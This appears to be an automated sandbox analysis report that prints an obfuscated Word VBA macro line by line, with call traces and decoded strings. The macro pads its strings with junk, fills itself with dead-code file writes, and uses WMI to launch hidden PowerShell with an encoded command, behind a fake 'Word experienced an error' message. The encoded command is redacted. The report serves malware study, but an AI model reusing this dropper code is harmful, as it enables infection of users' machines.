                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    V2enhc4htwl7z6bh

                                                    Thriap3q9rgf3yy9y

                                                    zZuzBZGD

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    OIbfvEEFF

                                                    Close

                                                    eLmLDU

                                                    FYVZFEH

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    hoyzuBGCP

                                                    Close

                                                    lADFBaJ

                                                    Strings / Decrypted Strings
                                                    Line | Instruction | Meta Information
                                                    2

                                                    Function G8xesq0b8jlsfrsp()

                                                    3

                                                    On Error Resume Next

                                                    executed
                                                    4

                                                    Dhubl2is48jort = "Jsnt2t9fi0a8nnsiaf" + "Bete9x47doew46v"

                                                    5

                                                    sf4 = Zw1k7hcmdl66 + A5gd21klfqu9c6rs.StoryRanges.Item(2 / 2) + Hyii7r76oq89

                                                    Zw1k7hcmdl66

                                                    Item

                                                    Hyii7r76oq89

                                                    6

                                                    Goto SblcDCC

                                                    7

                                                    Dim pULquU as Object

                                                    8

                                                    Set ibIiBF = diCXTi

                                                    diCXTi

                                                    9

                                                    Set pULquU = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    10

                                                    Dim SblcDCC as Object

                                                    11

                                                    Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")

                                                    CreateTextFile

                                                    12

                                                    SblcDCC.WriteLine "VrVKCjefsIJ"

                                                    WriteLine

                                                    13

                                                    SblcDCC.WriteLine "sxbwAfRtWJI"

                                                    WriteLine

                                                    14

                                                    SblcDCC.WriteLine "WLXLJnjItPGPZJ"

                                                    WriteLine

                                                    15

                                                    Set jbUmDI = NZiApKAp

                                                    NZiApKAp

                                                    16

                                                    SblcDCC.Close

                                                    Close

                                                    17

                                                    Set pULquU = Nothing

                                                    18

                                                    Set MznOjBB = vrYYHIDxI

                                                    vrYYHIDxI

                                                    19

                                                    Set SblcDCC = Nothing

                                                    19

                                                    SblcDCC:

                                                    21

                                                    t3s = "]anw[3" + "p]anw[3"

                                                    22

                                                    K50yjh8o6l7s = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"

                                                    23

                                                    Goto fNhiCVgGS

                                                    24

                                                    Dim RyDBDK as Object

                                                    25

                                                    Set WTbkNqFa = gzTFLxb

                                                    gzTFLxb

                                                    26

                                                    Set RyDBDK = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    27

                                                    Dim fNhiCVgGS as Object

                                                    28

                                                    Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")

                                                    CreateTextFile

                                                    29

                                                    fNhiCVgGS.WriteLine "ImJJdfAtdFHCh"

                                                    WriteLine

                                                    30

                                                    fNhiCVgGS.WriteLine "deVdMyoREdgzCaJb"

                                                    WriteLine

                                                    31

                                                    fNhiCVgGS.WriteLine "XZzpBRpDKuMgsGHIHF"

                                                    WriteLine

                                                    32

                                                    Set OlapGi = PjNhJNA

                                                    PjNhJNA

                                                    33

                                                    fNhiCVgGS.Close

                                                    Close

                                                    34

                                                    Set RyDBDK = Nothing

                                                    35

                                                    Set yabVbA = oAaNlB

                                                    oAaNlB

                                                    36

                                                    Set fNhiCVgGS = Nothing

                                                    36

                                                    fNhiCVgGS:

                                                    38

                                                    Brlo236t2rmfu = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"

                                                    39

                                                    Goto HCvCmAcHC

                                                    40

                                                    Dim iFTmFHFH as Object

                                                    41

                                                    Set UDSpFHqFJ = sySRJ

                                                    sySRJ

                                                    42

                                                    Set iFTmFHFH = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    43

                                                    Dim HCvCmAcHC as Object

                                                    44

                                                    Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")

                                                    CreateTextFile

                                                    45

                                                    HCvCmAcHC.WriteLine "uTtCAFwHpCGF"

                                                    WriteLine

                                                    46

                                                    HCvCmAcHC.WriteLine "lwWhZGEasjsS"

                                                    WriteLine

                                                    47

                                                    HCvCmAcHC.WriteLine "MiCjaGqJfPrI"

                                                    WriteLine

                                                    48

                                                    Set MmSDYCkJR = UwyYSBsBN

                                                    UwyYSBsBN

                                                    49

                                                    HCvCmAcHC.Close

                                                    Close

                                                    50

                                                    Set iFTmFHFH = Nothing

                                                    51

                                                    Set EISYDDB = tpOgXmm

                                                    tpOgXmm

                                                    52

                                                    Set HCvCmAcHC = Nothing

                                                    52

                                                    HCvCmAcHC:

                                                    54

                                                    Iogna_9cq5gv = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"

                                                    55

                                                    Goto gEcrV

                                                    56

                                                    Dim RqlOZAHRJ as Object

                                                    57

                                                    Set jsYAGBJAF = MHYlQAD

                                                    MHYlQAD

                                                    58

                                                    Set RqlOZAHRJ = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    59

                                                    Dim gEcrV as Object

                                                    60

                                                    Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")

                                                    CreateTextFile

                                                    61

                                                    gEcrV.WriteLine "dXFPCSYtSNB"

                                                    WriteLine

                                                    62

                                                    gEcrV.WriteLine "KqVyuQQfwTWh"

                                                    WriteLine

                                                    63

                                                    gEcrV.WriteLine "qDaYIDDSZQMTaO"

                                                    WriteLine

                                                    64

                                                    Set IePCGy = GznGGHyG

                                                    GznGGHyG

                                                    65

                                                    gEcrV.Close

                                                    Close

                                                    66

                                                    Set RqlOZAHRJ = Nothing

                                                    67

                                                    Set cwsTFPCH = bbsIZ

                                                    bbsIZ

                                                    68

                                                    Set gEcrV = Nothing

                                                    68

                                                    gEcrV:

                                                    70

                                                    Fo4b_d8mj9usjgaha = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"

                                                    Mid

                                                    Name

                                                    Application

                                                    71

                                                    Goto ZMdrVHGz

                                                    72

                                                    Dim xsruLB as Object

                                                    73

                                                    Set fiyQuiRBI = swNGWdd

                                                    swNGWdd

                                                    74

                                                    Set xsruLB = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    75

                                                    Dim ZMdrVHGz as Object

                                                    76

                                                    Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")

                                                    CreateTextFile

                                                    77

                                                    ZMdrVHGz.WriteLine "MxCpGaGqBgemCAFEJ"

                                                    WriteLine

                                                    78

                                                    ZMdrVHGz.WriteLine "hbtzFRJEXyDCXI"

                                                    WriteLine

                                                    79

                                                    ZMdrVHGz.WriteLine "zdTcdOoXXUFHJK"

                                                    WriteLine

                                                    80

                                                    Set xPBGH = rJEkbLH

                                                    rJEkbLH

                                                    81

                                                    ZMdrVHGz.Close

                                                    Close

                                                    82

                                                    Set xsruLB = Nothing

                                                    83

                                                    Set dLRiF = vEBqHrDnD

                                                    vEBqHrDnD

                                                    84

                                                    Set ZMdrVHGz = Nothing

                                                    84

                                                    ZMdrVHGz:

                                                    86

                                                    K427k3xfk130n18n = Iogna_9cq5gv + Fo4b_d8mj9usjgaha + Brlo236t2rmfu + t3s + K50yjh8o6l7s

                                                    87

                                                    Goto fDZVKAAc

                                                    88

                                                    Dim tzErBRFe as Object

                                                    89

                                                    Set SeHafBC = tWcKo

                                                    tWcKo

                                                    90

                                                    Set tzErBRFe = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    91

                                                    Dim fDZVKAAc as Object

                                                    92

                                                    Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")

                                                    CreateTextFile

                                                    93

                                                    fDZVKAAc.WriteLine "hKlajOujwgDFAA"

                                                    WriteLine

                                                    94

                                                    fDZVKAAc.WriteLine "JMgUDAIEJlgyNBH"

                                                    WriteLine

                                                    95

                                                    fDZVKAAc.WriteLine "BUUJYAAIoJvLBLAo"

                                                    WriteLine

                                                    96

                                                    Set CHVmaVC = LzxxRHG

                                                    LzxxRHG

                                                    97

                                                    fDZVKAAc.Close

                                                    Close

                                                    98

                                                    Set tzErBRFe = Nothing

                                                    99

                                                    Set WlBWDXGD = EKezHIC

                                                    EKezHIC

                                                    100

                                                    Set fDZVKAAc = Nothing

                                                    100

                                                    fDZVKAAc:

                                                    102

                                                    Lutf6_3d403q9 = Jlda77h_v8nx5(K427k3xfk130n18n)

                                                    103

                                                    Goto rYbgBh

                                                    104

                                                    Dim hZCth as Object

                                                    105

                                                    Set LQqlBAHD = DpYbmDA

                                                    DpYbmDA

                                                    106

                                                    Set hZCth = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    107

                                                    Dim rYbgBh as Object

                                                    108

                                                    Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")

                                                    CreateTextFile

                                                    109

                                                    rYbgBh.WriteLine "CVbRCAAhkhmcDG"

                                                    WriteLine

                                                    110

                                                    rYbgBh.WriteLine "XrrAwQZPjqB"

                                                    WriteLine

                                                    111

                                                    rYbgBh.WriteLine "fxSJajCGlWUEBW"

                                                    WriteLine

                                                    112

                                                    Set phIwFD = hDJDJ

                                                    hDJDJ

                                                    113

                                                    rYbgBh.Close

                                                    Close

                                                    114

                                                    Set hZCth = Nothing

                                                    115

                                                    Set PnolTIbAB = dXiwA

                                                    dXiwA

                                                    116

                                                    Set rYbgBh = Nothing

                                                    116

                                                    rYbgBh:

                                                    118

                                                    Set Mwzin4vxc1irit = CreateObject(Lutf6_3d403q9)

                                                    CreateObject("winmgmts:win32_process")

                                                    executed
                                                    119

                                                    Goto GfRPP

                                                    120

                                                    Dim xLQtMd as Object

                                                    121

                                                    Set uRnkDGJ = hFSyAfFrF

                                                    hFSyAfFrF

                                                    122

                                                    Set xLQtMd = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    123

                                                    Dim GfRPP as Object

                                                    124

                                                    Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")

                                                    CreateTextFile

                                                    125

                                                    GfRPP.WriteLine "qiXBsMBsLJGbX"

                                                    WriteLine

                                                    126

                                                    GfRPP.WriteLine "mehEFPFHcklgJDDx"

                                                    WriteLine

                                                    127

                                                    GfRPP.WriteLine "BndJDkuVYF"

                                                    WriteLine

                                                    128

                                                    Set xiFRA = hXxQDACJA

                                                    hXxQDACJA

                                                    129

                                                    GfRPP.Close

                                                    Close

                                                    130

                                                    Set xLQtMd = Nothing

                                                    131

                                                    Set jENfzNH = xkQqDXCcD

                                                    xkQqDXCcD

                                                    132

                                                    Set GfRPP = Nothing

                                                    132

                                                    GfRPP:

                                                    134

                                                    Jaaqx1xn5daotw = Mid(sf4, (1 + 4), Len(sf4))

                                                    Mid


                                                    executed
                                                    135

                                                    Goto sCOIGDtD

                                                    136

                                                    Dim eepvDEaE as Object

                                                    137

                                                    Set jzqBlGW = lBenBDA

                                                    lBenBDA

                                                    138

                                                    Set eepvDEaE = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    139

                                                    Dim sCOIGDtD as Object

                                                    140

                                                    Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")

                                                    CreateTextFile

                                                    141

                                                    sCOIGDtD.WriteLine "JTSPCDjykfL"

                                                    WriteLine

                                                    142

                                                    sCOIGDtD.WriteLine "bBmgOCvPPojGGC"

                                                    WriteLine

                                                    143

                                                    sCOIGDtD.WriteLine "anBQXljzGenE"

                                                    WriteLine

                                                    144

                                                    Set tAmQHxlD = UavHTIBHo

                                                    UavHTIBHo

                                                    145

                                                    sCOIGDtD.Close

                                                    Close

                                                    146

                                                    Set eepvDEaE = Nothing

                                                    147

                                                    Set gphNDVZp = IcAHwPH

                                                    IcAHwPH

                                                    148

                                                    Set sCOIGDtD = Nothing

                                                    148

                                                    sCOIGDtD:

                                                    150

                                                    Goto fmwdEMADQ

                                                    151

                                                    Dim DkLoDL as Object

                                                    152

                                                    Set plqkuDI = BNmrm

                                                    BNmrm

                                                    153

                                                    Set DkLoDL = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    154

                                                    Dim fmwdEMADQ as Object

                                                    155

                                                    Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")

                                                    CreateTextFile

                                                    156

                                                    fmwdEMADQ.WriteLine "dnUnKFHAkIOdD"

                                                    WriteLine

                                                    157

                                                    fmwdEMADQ.WriteLine "ekluIEBJFIgoBcGC"

                                                    WriteLine

                                                    158

                                                    fmwdEMADQ.WriteLine "BnxHFzJCGhVHrFIm"

                                                    WriteLine

                                                    159

                                                    Set jPJENIo = FLtYjKHC

                                                    FLtYjKHC

                                                    160

                                                    fmwdEMADQ.Close

                                                    Close

                                                    161

                                                    Set DkLoDL = Nothing

                                                    162

                                                    Set ANzGyzCD = qAUhkIMz

                                                    qAUhkIMz

                                                    163

                                                    Set fmwdEMADQ = Nothing

                                                    163

                                                    fmwdEMADQ:

                                                    165

                                                    Mwzin4vxc1irit.Create Jlda77h_v8nx5(Jaaqx1xn5daotw), V2enhc4htwl7z6bh, Thriap3q9rgf3yy9y

                                                    SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [encoded command removed],,) -> 0

                                                    V2enhc4htwl7z6bh

                                                    Thriap3q9rgf3yy9y

                                                    executed
                                                    166

                                                    Goto pkixJADG

                                                    167

                                                    Dim DhnHIY as Object

                                                    168

                                                    Set oQgLUI = zZuzBZGD

                                                    zZuzBZGD

                                                    169

                                                    Set DhnHIY = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    170

                                                    Dim pkixJADG as Object

                                                    171

                                                    Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")

                                                    CreateTextFile

                                                    172

                                                    pkixJADG.WriteLine "fDdPHEjBEnAdZqZFJ"

                                                    WriteLine

                                                    173

                                                    pkixJADG.WriteLine "wypNISsWSXthFJCq"

                                                    WriteLine

                                                    174

                                                    pkixJADG.WriteLine "LvnHAGHfIhRDBRAF"

                                                    WriteLine

                                                    175

                                                    Set ecGmY = OIbfvEEFF

                                                    OIbfvEEFF

                                                    176

                                                    pkixJADG.Close

                                                    Close

                                                    177

                                                    Set DhnHIY = Nothing

                                                    178

                                                    Set EKmLA = eLmLDU

                                                    eLmLDU

                                                    179

                                                    Set pkixJADG = Nothing

                                                    179

                                                    pkixJADG:

                                                    181

                                                    Goto KmGOADt

                                                    182

                                                    Dim CFdSBD as Object

                                                    183

                                                    Set nhLeJMLfI = FYVZFEH

                                                    FYVZFEH

                                                    184

                                                    Set CFdSBD = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    185

                                                    Dim KmGOADt as Object

                                                    186

                                                    Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")

                                                    CreateTextFile

                                                    187

                                                    KmGOADt.WriteLine "DBvMcNtCcMyJDDI"

                                                    WriteLine

                                                    188

                                                    KmGOADt.WriteLine "eXpjHFapHaPdRJu"

                                                    WriteLine

                                                    189

                                                    KmGOADt.WriteLine "eXObOTlBAITEOIo"

                                                    WriteLine

                                                    190

                                                    Set STzBjwICv = hoyzuBGCP

                                                    hoyzuBGCP

                                                    191

                                                    KmGOADt.Close

                                                    Close

                                                    192

                                                    Set CFdSBD = Nothing

                                                    193

                                                    Set ORLICIl = lADFBaJ

                                                    lADFBaJ

                                                    194

                                                    Set KmGOADt = Nothing

                                                    194

                                                    KmGOADt:

                                                    196

                                                    End Function

                                                    APIs

                                                    Meta Information

                                                    SQQWY

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    ddanFDWJf

                                                    Close

                                                    RhztCF

                                                    kwzjKvZHe

                                                    CreateObject

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    inIcjJtaF

                                                    Close

                                                    zBSWCKmJv

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Pg5minli2d3c9

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: sreXHFD

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: eCIzUDyJ

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Close

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: yJmmmVIAG

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Replace

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Ij2hesgjee57d3s0

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: uVItICICB

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: anyPG

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Close

                                                    Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: YVZXECEHD

                                                    KXTliE

                                                    CreateObject

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    YZllAeRe

                                                    Close

